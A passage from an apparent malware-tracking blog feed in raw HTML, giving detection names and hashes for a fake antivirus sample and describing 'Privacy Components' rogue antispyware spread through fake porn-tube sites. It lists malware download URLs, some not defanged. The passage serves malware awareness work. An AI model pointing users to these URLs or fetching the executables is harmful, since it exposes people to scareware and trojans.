width="17"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td&gt;45568 Bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td&gt;e079854d56607f16fb0d5db3b724c0de &lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=e079854d56607f16fb0d5db3b724c0de" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=18e8a9be9a4116bc459f2100afeab8100&amp;amp;format=html" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td&gt;&lt;a href="http://www.virustotal.com/analisis/612eb2eeb8a64689184f4b5a03c73319" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td&gt;03.21.2009 16:00:04 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td&gt;12/39 (66.67%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;W32/FakeAV.8074!tr&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.FraudLoad.vmtk&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;SHeur2.WXJ&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;TR/Crypt.XPACK.Gen&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Sus/FakeAV-A&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Trojan.Win32.Tibs (Sig-Id:470535) [Ikarus Virus Scanner]&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Result when running:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="200"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s1600-h/Anti-Virus+Number-1+Installer.bmp"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 177px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScjjL5dpjsI/AAAAAAAAAMo/cMfcqaGeTMI/s320/Anti-Virus+Number-1+Installer.bmp" border="0" alt=""id="BLOGGER_PHOTO_ID_5316749153654116034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-8837948112905438335?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/8837948112905438335'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/8837948112905438335'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/best-click-scannerinfo-antivirus-2010.html' title='best-click-scanner.info Antivirus 2010 Rogue AntiSpyware'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_9YOi_bjoDL4/ScjVU7LMa3I/AAAAAAAAALw/du4BZHmwj2w/s72-c/Antivirus2010-best-click-scanner.info.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-1526983036343303670</id><published>2009-03-24T00:51:00.000-07:00</published><updated>2009-03-24T00:57:32.965-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue.Sysguard'/><category scheme='http://www.blogger.com/atom/ns#' term='tube-funs-world.com'/><category scheme='http://www.blogger.com/atom/ns#' term='Privacy components removal'/><category scheme='http://www.blogger.com/atom/ns#' term='Sus/Behav-113'/><category scheme='http://www.blogger.com/atom/ns#' term='Privacy center removal'/><category scheme='http://www.blogger.com/atom/ns#' term='Privacy components'/><category scheme='http://www.blogger.com/atom/ns#' term='Win32.SPRFraud.PrivC'/><category scheme='http://www.blogger.com/atom/ns#' term='spbho.dll'/><category scheme='http://www.blogger.com/atom/ns#' term='tube-funs-world removal'/><title type='text'>tube-funs-world-com Spyware (Privacy Components)</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="2095" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td colspan="2" valign="top" height="92"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;tube-funs-world.com - Rogue.AntiSpyware.Sysguard &amp;quot;Privacy components&amp;quot;&lt;/span&gt;&lt;br /&gt; &lt;br /&gt;Privacy Components is another rogue antispyware that displays fake security alerts,&lt;br /&gt;This program is known to be installed on computers without users approval,&lt;br /&gt;
dropped by a trojan or using other malicious technics.&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="25" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="547"&gt;&lt;br /&gt;&lt;table width="514" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;Fake PornTube website&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="3"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://tube-funs-world.com/promo2/?aid=561&amp;amp;vname=free_dvd_rip&lt;br /&gt;
hxxp://tube-funs-world.com/promo2/?aid=561&amp;amp;vname=stream_player_plugin&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;hxxp://tube-funs-world.com/promo2/2.php?aid=561&amp;amp;vname=stream_player_plugin&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;stream_player_plugin.exe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;Fake  scannerwith the look of Windows Explorer&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;hxxp://tube-funs-world.com/promo3/&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;hxxp://tube-funs-world.com/promo3/get.php?aid=0&amp;amp;vname=protect&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;protect.exe (same file - )&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;Some java scripts&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;hxxp://tube-funs-world.com/promo4/&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;hxxp://tube-funs-world.com/promo4/get.php?aid=0&amp;amp;vname=stream_player_plugin&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;stream_player_plugin.exe (same file)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;Another Fake PornTube website with the logo SexTube&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;http://tube-funs-world.com/promo5/&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;http://tube-funs-world.com/promo5/get.php?aid=0&amp;amp;vname=setup&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="3"&gt;setup.exe (same file)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan="4"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td colspan="2" bgcolor="#E8E8E8" style="height:2px"&g
